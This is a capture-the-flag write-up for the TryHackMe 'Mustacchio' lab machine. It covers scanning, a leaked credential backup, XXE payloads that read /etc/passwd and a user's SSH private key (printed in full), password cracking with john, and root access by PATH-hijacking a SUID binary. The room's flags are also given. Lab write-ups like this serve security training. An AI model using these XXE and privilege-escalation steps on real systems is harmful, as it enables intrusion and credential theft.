TryHackMe - Mustacchio - Writeup
Easy boot2root Machine
Nmap Scan
root@ip-10-10-97-27:~# nmap -sCV -p- 10.10.91.167 -T4
Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-12 09:53 BST
Nmap scan report for ip-10-10-91-167.eu-west-1.compute.internal (10.10.91.167)
Host is up (0.00049s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d3:9e:50:66:5f:27:a0:60:a7:e8:8b:cb:a9:2a:f0:19 (RSA)
| 256 5f:98:f4:5d:dc:a1:ee:01:3e:91:65:0a:80:52:de:ef (ECDSA)
|_ 256 5e:17:6e:cd:44:35:a8:0b:46:18:cb:00:8d:49:b3:f6 (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
8765/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
MAC Address: 02:71:2C:CE:E8:AD (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 637.98 seconds
Directory Fuzzing
root@ip-10-10-97-27:~# dirb http://10.10.91.167
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jun 12 09:16:44 2021
URL_BASE: http://10.10.91.167/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.91.167/ ----
==> DIRECTORY: http://10.10.91.167/custom/
==> DIRECTORY: http://10.10.91.167/fonts/
==> DIRECTORY: http://10.10.91.167/images/
+ http://10.10.91.167/index.html (CODE:200|SIZE:1752)
+ http://10.10.91.167/robots.txt (CODE:200|SIZE:28)
+ http://10.10.91.167/server-status (CODE:403|SIZE:277)
In the http://10.10.91.167/custom/js/ folder there is a file called users.bak which is sqlite db.
root@ip-10-10-97-27:~# file users.bak
users.bak: SQLite 3.x database, last written using SQLite version 3034001
Open the sqlite db with sqlite browser there is a user name admin and md5 password. You can get the md5 password in http://10.10.91.167/custom/js/mobile.js file.
Go to https://hashes.com/en/decrypt/hash and decrypt the password
1868e36a6d2b17d4c2745f1659433a54d4bc5f4b:bulldog19
Now in the machine there is SSH enabled try to login with admin:bulldog19 we failed to login via ssh but we know there is another port 8765 running as well login to the admin panel with admin:bulldog19 . We got access to admin panel.
In home.php source view you’ll get this, the document.cookie = “Example=/auth/dontforget.bak”; interesting.
<script type="text/javascript">
//document.cookie = "Example=/auth/dontforget.bak";
function checktarea() {
let tbox = document.getElementById("box").value;
if (tbox == null || tbox.length == 0) {
alert("Insert XML Code!")
}
}
</script>
</head>
<body>
<!-- Barry, you can now SSH in using your key!-->
Follow the path http://10.10.91.167:8765/auth/dontforget.bak
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could\u2019ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could\u2019ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
This XML viewer vulnerable to XXE. Use bellow payload to fetch the user in this machine. In the comment in the HTML source there is a hint about there is SSH key. We will try to fetch it.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxepay [
<!ELEMENT xxepay ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<comment>
<name>&xxe;</name>
<author>Any Author</author>
<com>Any comment</com>
</comment>
This payload returned the the passwd file and the user of this machine is barry, I changed the path to /home/barry/.ssh/id_rsa to access SSH key.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxepay [
<!ELEMENT xxepay ANY >
<!ENTITY xxe SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<comment>
<name>&xxe;</name>
<author>Any Author</author>
<com>Any comment</com>
</comment>
Here is the private key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,D137279D69A43E71BB7FCB87FC61D25E
jqDJP+blUr+xMlASYB9t4gFyMl9VugHQJAylGZE6J/b1nG57eGYOM8wdZvVMGrfN
bNJVZXj6VluZMr9uEX8Y4vC2bt2KCBiFg224B61z4XJoiWQ35G/bXs1ZGxXoNIMU
MZdJ7DH1k226qQMtm4q96MZKEQ5ZFa032SohtfDPsoim/7dNapEOujRmw+ruBE65
l2f9wZCfDaEZvxCSyQFDJjBXm07mqfSJ3d59dwhrG9duruu1/alUUvI/jM8bOS2D
Wfyf3nkYXWyD4SPCSTKcy4U9YW26LG7KMFLcWcG0D3l6l1DwyeUBZmc8UAuQFH7E
NsNswVykkr3gswl2BMTqGz1bw/1gOdCj3Byc1LJ6mRWXfD3HSmWcc/8bHfdvVSgQ
ul7A8ROlzvri7/WHlcIA1SfcrFaUj8vfXi53fip9gBbLf6syOo0zDJ4Vvw3ycOie
TH6b6mGFexRiSaE/u3r54vZzL0KHgXtapzb4gDl/yQJo3wqD1FfY7AC12eUc9NdC
rcvG8XcDg+oBQokDnGVSnGmmvmPxIsVTT3027ykzwei3WVlagMBCOO/ekoYeNWlX
bhl1qTtQ6uC1kHjyTHUKNZVB78eDSankoERLyfcda49k/exHZYTmmKKcdjNQ+KNk
4cpvlG9Qp5Fh7uFCDWohE/qELpRKZ4/k6HiA4FS13D59JlvLCKQ6IwOfIRnstYB8
7+YoMkPWHvKjmS/vMX+elcZcvh47KNdNl4kQx65BSTmrUSK8GgGnqIJu2/G1fBk+
T+gWceS51WrxIJuimmjwuFD3S2XZaVXJSdK7ivD3E8KfWjgMx0zXFu4McnCfAWki
ahYmead6WiWHtM98G/hQ6K6yPDO7GDh7BZuMgpND/LbS+vpBPRzXotClXH6Q99I7
LIuQCN5hCb8ZHFD06A+F2aZNpg0G7FsyTwTnACtZLZ61GdxhNi+3tjOVDGQkPVUs
pkh9gqv5+mdZ6LVEqQ31eW2zdtCUfUu4WSzr+AndHPa2lqt90P+wH2iSd4bMSsxg
laXPXdcVJxmwTs+Kl56fRomKD9YdPtD4Uvyr53Ch7CiiJNsFJg4lY2s7WiAlxx9o
vpJLGMtpzhg8AXJFVAtwaRAFPxn54y1FITXX6tivk62yDRjPsXfzwbMNsvGFgvQK
DZkaeK+bBjXrmuqD4EB9K540RuO6d7kiwKNnTVgTspWlVCebMfLIi76SKtxLVpnF
6aak2iJkMIQ9I0bukDOLXMOAoEamlKJT5g+wZCC5aUI6cZG0Mv0XKbSX2DTmhyUF
ckQU/dcZcx9UXoIFhx7DesqroBTR6fEBlqsn7OPlSFj0lAHHCgIsxPawmlvSm3bs
7bdofhlZBjXYdIlZgBAqdq5jBJU8GtFcGyph9cb3f+C3nkmeDZJGRJwxUYeUS9Of
1dVkfWUhH2x9apWRV8pJM/ByDd0kNWa/c//MrGM0+DKkHoAZKfDl3sC0gdRB7kUQ
+Z87nFImxw95dxVvoZXZvoMSb7Ovf27AUhUeeU8ctWselKRmPw56+xhObBoAbRIn
7mxN/N5LlosTefJnlhdIhIDTDMsEwjACA+q686+bREd+drajgk6R9eKgSME7geVD
-----END RSA PRIVATE KEY-----
This key encrypted we have to crack the password for this we are going to use ssh2john and john.
root@ip-10-10-97-27:~# python3 ssh2john.py id_rsa > id_rsa.enc
root@ip-10-10-97-27:~# john id_rsa.enc --wordlist=/usr/share/wordlists/rockyou.txt
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
urieljames (id_rsa)
The password is: urieljames
Now we can use the password to unlock SSH key. Logged in success
root@ip-10-10-97-27:~# ssh -i id_rsa barry@10.10.91.167
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
13 packages can be updated.
10 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
barry@mustacchio:~$ cat user.txt
62d77a4d5f97d47c5aa38b3b2651b831
What is the user flag?
- Answer: 62d77a4d5f97d47c5aa38b3b2651b831
For privilege escalation first thing I try is sudo -l so I try this for this machine also but It didn’t worked. Moving on to check /etc/ /opt/ folders nothing in there.
In the hint I saw that it said SUID?
Let’s find SUID permission file
barry@mustacchio:~$ find / -perm /4000 2>/dev/null
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/at
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/newuidmap
/usr/bin/gpasswd
/home/joe/live_log
/bin/ping
/bin/ping6
/bin/umount
/bin/mount
/bin/fusermount
/bin/su
The odd thing I notice is /home/joe/live_log executable. When you’ll run it you’ll get live log of admin panel. Use strings command to see if we can find any command which helping to see live log.
barry@mustacchio:~$ strings /home/joe/live_log
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
printf
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
Live Nginx Log Reader
tail -f /var/log/nginx/access.log
tail -f /var/log/nginx/access.log tail is helping to disaply live log.
Now go to /tmp folder and create a file named with tail
#!/bin/bash
/bin/bash
change the permission
barry@mustacchio:/tmp$ chmod 777 tail
barry@mustacchio:/tmp$ export PATH=/tmp:$PATH
barry@mustacchio:/tmp$ which tail
/tmp/tail
Now add /tmp path to $PATH environment. Now run the /home/joe/live_log you’ll get root privilege.
root@mustacchio:/tmp# cat /root/root.txt
3223581420d906c4dd1a5f9b530393a5
What is the root flag?
- Answer: 3223581420d906c4dd1a5f9b530393a5
Thanks for reading
Room Link: Mustacchio